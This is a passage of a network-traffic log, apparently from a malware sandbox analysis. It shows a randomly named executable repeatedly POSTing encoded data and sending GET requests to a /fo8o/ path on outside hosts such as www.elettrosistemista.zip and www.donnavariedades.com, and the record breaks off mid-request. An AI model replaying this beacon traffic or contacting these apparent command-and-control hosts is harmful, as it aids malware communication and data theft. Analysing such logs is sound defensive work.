36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d Data Ascii: bD=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
Apr 19, 2024 03:30:24.219103098 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:24 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49751	195.110.124.133	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:26.753413916 CEST	1839	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 6b 46 70 64 48 4e 7a 65 4e 48 78 79 39 50 63 77 32 34 76 64 44 49 74 74 2b 65 38 57 54 62 5a 39 55 52 75 61 7a 59 57 73 70 35 36 38 2f 66 30 79 4b 43 6a 52 66 63 6c 74 6a 2f 43 41 31 66 52 36 31 72 4d 63 39 77 64 6b 34 4b 61 72 61 64 59 36 50 64 63 37 30 37 36 75 51 79 2b 65 4c 4f 30 51 37 4b 59 74 2f 54 51 67 6d 5a 53 33 45 62 6a 75 55 43 6d 4f 33 72 62 73 51 31 70 67 39 64 34 6d 6b 41 44 4e 77 6a 59 71 63 35 33 49 4f 54 37 4a 58 43 74 61 51 58 4b 39 39 6d 76 2b 6d 6e 2b 38 4c 5a 50 4e 49 4e 70 75 2b 51 78 73 6c 31 51 48 43 79 77 54 55 37 78 75 64 6c 77 68 54 38 4a 4a 52 52 45 72 4e 41 32 78 78 75 4e 62 4c 75 46 46 41 42 64 68 42 55 31 48 4a 37 73 74 55 37 57 46 54 79 4c 4c 4d 57 65 34 38 7a 50 33 58 4f 65 31 6c 47 66 71 42 53 46 6e 39 6c 55 2b 6d 4a 4f 57 46 6b 44 65 6e 62 45 4d 50 32 75 7a 52 36 76 78 33 71 6d 74 30 32 61 67 4e 58 67 51 4d 66 34 33 33 6e 6e 69 46 37 32 61 72 55 2f 2b 48 7a 66 4d 78 33 6a 48 6b 4f 44 54 4e 6d 55 75 64 30 2b 54 75 5a 77 67 6f 38 77 61 5a 6d 50 2b 4c 6b 35 70 42 73 67 52 57 58 63 5a 33 53 62 6b 30 5a 64 4f 63 67 74 42 39 6d 71 57 62 57 38 54 56 33 71 32 6b 2b 32 6a 61 57 6d 6f 48 47 59 6e 45 67 58 71 62 51 70 6e 39 56 36 75 6a 45 59 2b 6e 72 69 69 36 69 5a 49 33 69 50 6b 39 66 78 44 52 44 70 77 30 32 72 39 70 77 6c 37 62 30 67 50 2f 75 51 4d 43 56 44 62 58 63 38 66 6f 63 44 30 62 79 32 38 65 58 64 34 56 58 54 47 6f 62 69 4d 4f 6e 55 59 56 6f 34 7a 32 54 46 55 55 46 50 2b 61 4d 2f 35 6f 4f 68 44 6a 6c 78 61 77 67 4e 53 4e 45 48 6b 77 73 67 42 75 79 65 4f 72 4b 45 58 4e 4f 68 6e 7a 6b 36 52 30 6a 7a 41 6b 58 76 4a 43 75 35 65 4d 70 56 51 56 33 61 72 69 35 5a 56 56 62 57 48 70 78 63 2b 71 31 5a 4b 72 50 54 57 6d 35 54 39 59 53 4a 52 31 61 4e 7a 67 43 79 4d 2f 76 70 45 64 6f 33 39 47 4f 58 34 39 59 4b 52 50 6a 31 6c 55 74 77 71 63 36 59 4e 4b 65 33 42 70 2b 4b 56 74 6b 4e 59 63 50 36 4a 6d 76 67 54 6b 30 48 54 63 7a 54 4a 5a 75 6e 66 52 55 67 52 41 51 6a 7a 6f 78 6d 49 54 5a 54 42 4a 67 41 46 4b 5a 6a 67 30 42 76 38 5a 47 62 46 67 45 41 31 65 4c 43 4a 41 53 46 4c 64 73 39 74 78 41 33 2b 43 79 47 53 59 6d 4d 6c 76 4d 6e 42 63 68 77 63 69 53 2b 70 46 44 7a 46 4a 34 75 74 59 70 69 49 64 58 72 7a 5a 74 58 61 76 4a 45 65 64 54 6d 34 38 37 54 45 65 76 76 67 38 67 4b 74 6b 68 76 64 32 72 57 54 6a 69 30 73 42 62 50 78 4f 2b 43 4c 35 2f 59 4c 30 72 4d 72 4d 68 64 64 59 4c 4f 71 5a 32 6b 78 57 55 79 44 4a 78 65 63 61 45 67 4f 77 54 77 52 49 4f 43 34 35 35 4f 38 78 72 57 61 6d 42 6f 33 2b 31 30 50 79 65 69 70 59 6f 74 75 56 41 70 48 6c 37 63 5a 72 45 31 47 61 2b 36 36 78 4b 4d 6a 55 4c 30 53 79 78 2b 76 53 4f 4b 67 71 58 6e 2b 6c 71 4f 47 34 50 75 2f 4e 7a 73 77 75 64 6e 39 69 66 6f 45 38 53 5a 54 56 54 50 4c 54 6e 6b 4b 4a 46 36 4a 71 61 6c 45 50 33 65 53 59 3d Data Ascii: bD=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJASFLds9txA3+CyGSYmMlvMnBchwciS+pFDzFJ4utYpiIdXrzZtXavJEedTm487TEevvg8gKtkhvd2rWTji0sBbPxO+CL5/YL0rMrMhddYLOqZ2kxWUyDJxecaEgOwTwRIOC455O8xrWamBo3+10PyeipYotuVApHl7cZrE1Ga+66xKMjUL0Syx+vSOKgqXn+lqOG4Pu/Nzswudn9ifoE8SZTVTPLTnkKJF6JqalEP3eSY=
Apr 19, 2024 03:30:26.989162922 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:26 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	49752	195.110.124.133	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:29.508091927 CEST	521	OUT	GET /fo8o/?VVq=lF_H&bD=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 19, 2024 03:30:29.734710932 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:29 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49753	23.227.38.74	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:35.092833042 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 49 35 67 38 45 2f 39 70 39 35 6e 63 76 6d 35 51 55 38 4a 4f 34 30 59 59 6f 38 35 5a 77 34 37 77 67 71 75 79 7a 5a 64 73 79 66 74 Data Ascii: bD=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpI5g8E/9p95ncvm5QU8JO40YYo85Zw47wgquyzZdsyft
Apr 19, 2024 03:30:35.252870083 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: cda6cc78-d276-4ac2-9725-501786e796d5-1713490235 server-timing: processing;dur=6 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=cda6cc78-d276-4ac2-9725-501786e796d5-1713490235 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=cda6cc78-d276-4ac2-9725-501786e796d5-1713490235 x-dc: gcp-us-east1,gcp-us-east1,us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRf826TXxxIhCXJLtQ1zlA2YkG54J3W7M%2B8%2F07HO3K1BazAuAm1zeNGz4N0d7k3Ufz4qq2%2B2XgimMfkwF0BeWeWBDB5%2F0ls0lwx0dND4uFcJ9BeSMcnSAVH5R%2FymJkxdMAOrTvHjlBhI"}],"group":"cf-nel","max_age Data Raw: Data Ascii:
Apr 19, 2024 03:30:35.252897024 CEST	210	IN	Data Raw: 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 Data Ascii: :604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=54.000139Server: cloudflareCF-RAY: 87692151997553bb-ATLalt-svc: h3=":443"; ma=86400
Apr 19, 2024 03:30:35.252914906 CEST	1289	IN	Data Raw: 62 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7f 73 db b6 19 fe 3f 9f 02 a6 da c6 ea 89 22 29 89 12 25 4b ea 25 b6 73 cb ae 77 6b 97 f6 7a 5d db db 81 24 28 31 a6 08 0e a4 2c ab 59 bf fb 1e 00 24 45 ca 56 aa 64 e9 ba 73 72 26 41 e0 c5 fb fb Data Ascii: b6bZs?")%K%swkz]$(1,Y$EVdsr&A}>cd]liG$)[2eI#lLx MW&^0~1\|'DVJ"">%0hh\|F\|J59+2=C}("akhMm7&F~`~aIB&q.S
Apr 19, 2024 03:30:35.252933025 CEST	1289	IN	Data Raw: 4f 8f c3 af f1 a5 cc 0d 04 2c cb 7f fd 21 28 1d 65 86 8f 24 d3 c8 0a 1f 49 01 76 2b 04 4d d1 df 49 77 97 d1 2a 19 cc 09 a3 39 33 e3 d4 e4 db 82 d8 79 2d f9 59 73 a5 6c 67 4d ac 93 ad 0a 0c e9 37 db 7c 36 44 2e 28 d5 73 3c 5c 46 50 63 62 59 95 ea Data Ascii: O,!(e$Iv+MIw*93y-YslgM7\|6D.(s<\FPcbYj]=,Jz'C\d_n8d!!>I"["unH;#$g9gSxT5zz7,zVqpm:!TS9dh1RB5]gJ6\|q;saK
Apr 19, 2024 03:30:35.252948999 CEST	352	IN	Data Raw: 0f 6e 1f 2f ab 6f e4 62 41 9e 07 6b 16 dc 01 46 69 36 0e cf c9 17 5f 1c 88 cb 59 80 c0 5b 13 ba 75 9f 55 11 d6 1c e1 8a 6d 41 ac 9f fb 97 e5 55 4f f7 67 99 b1 3f b3 ae 0e 69 a3 5a d0 e4 a4 bf a1 45 b0 be 14 ac fb 14 61 4d 7a b3 2f 69 ea 4a 8d 7d Data Ascii: n/obAkFi6_Y[uUmAUOg?iZEaMz/iJ}X}D}TWHT(9QjuU#ebBM^5GOoy}ZWNpVINvySIRoqyy~2SvwO-$gDKiK8A_]V,Y=$(i{y!r
Apr 19, 2024 03:30:35.252965927 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	49754	23.227.38.74	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:37.721256018 CEST	820	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 55 61 59 71 6b 4c 5a 51 34 52 79 67 53 75 67 6b 56 36 6a 47 36 4f 6d 69 6f 6b 53 65 55 43 6f 42 5a 58 7a 6e 55 52 42 77 46 63 4f 41 3d 3d Data Ascii: bD=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoUaYqkLZQ4RygSugkV6jG6OmiokSeUCoBZXznURBwFcOA==
Apr 19, 2024 03:30:37.885565042 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 19 Apr 2024 01:30:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: -1 Vary: Accept-Encoding x-frame-options: DENY x-request-id: 047a14c3-49e7-4a15-a366-3f04c486f093-1713490237 server-timing: processing;dur=8 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=047a14c3-49e7-4a15-a366-3f04c486f093-1713490237 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=047a14c3-49e7-4a15-a366-3f04c486f093-1713490237 x-dc: gcp-us-east1,gcp-us-east1,us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDNXxfaq1bk2MetZq15RSdG7WKLZBIU6r5%2BWOgQwJzLFx8mdGs%2FRe5IK2ZsEcVt%2ByWiWNpMQNHHW410VFQkOFMs6PUhLtAeJT8CENW5Ub%2BJeXe2NrJoAXZbEZUtuWYiA6u%2B7Im7t8pNg"}],"group":"cf-nel","max_age Data Raw: Data Ascii:
Apr 19, 2024 03:30:37.885607004 CEST	210	IN	Data Raw: 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 Data Ascii: :604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=58.999777Server: cloudflareCF-RAY: 876921620b3c1392-ATLalt-svc: h3=":443"; ma=86400
Apr 19, 2024 03:30:37.885646105 CEST	1289	IN	Data Raw: 62 36 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cd 5a 7f 73 9b 46 1a fe 3f 9f 62 8d da c6 ea 09 01 42 48 48 96 d4 49 6c 67 26 73 b9 49 a6 69 a7 37 d3 76 6e 16 58 24 6c c4 52 40 96 95 5c be fb 3d bb 0b 08 64 2b 51 72 e9 f5 c6 c9 18 96 dd 77 df df ef Data Ascii: b69ZsF?bBHHIlg&sIi7vnX$lR@\=d+Qrwzvpux2;_yyM/L\| ~L\|%\IFA4d9Xa,w]gqqJd)%!cbmV'_,g\ETlq1Z0Bre>#0/`@8&8JYc[
Apr 19, 2024 03:30:37.885687113 CEST	1289	IN	Data Raw: 3d 35 0e bf c6 97 32 37 10 b0 2c fe f5 6d 50 3a c8 0c 5f 48 a6 91 15 be 90 02 ec 56 64 34 41 7f 27 dc 5d 44 ab 60 30 27 8c e6 4c 8f 12 9d 6f 0a 62 e6 b5 e4 27 cd 15 b2 9d 34 b1 4e b6 32 30 84 df 6c f2 a9 8d 5c 50 aa e7 70 b8 8c a0 c6 c4 b2 2a d5 Data Ascii: =527,mP:_HVd4A']D`0'Lob'4N20l\PpH{1o24BG2IuLrB\|v}rH:h0cR0$_l!\|$O&s4$OUj83ql{Pfw\rr8{m^_sM(UzN3dFs=t/_}N\
Apr 19, 2024 03:30:37.885721922 CEST	350	IN	Data Raw: 1f cf ab 6f e4 6c 4e 9e fa 2b e6 df 02 46 69 36 0e 4f c9 77 df ed 89 8b 59 80 c0 5b 13 ba 75 9f 55 11 56 1c e1 8a 6d 4e 8c df fa e7 e5 55 4f f7 37 91 b1 bf 31 2e f6 69 a3 5a d0 e4 a4 bf a6 85 bf 3a cf 58 f7 31 c2 8a f4 7a 57 d2 54 95 1a fb b0 c4 Data Ascii: olN+Fi6OwY[uUVmNUO71.iZ:X1zWTD2J=_<h8Pp"t+s0+t(sM\9YG;Z8'5oiL>aq0Ypl7`HvRj>!CjZ
Apr 19, 2024 03:30:37.885759115 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	49755	23.227.38.74	80	4092	C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 03:30:40.364967108 CEST	1833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 44 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 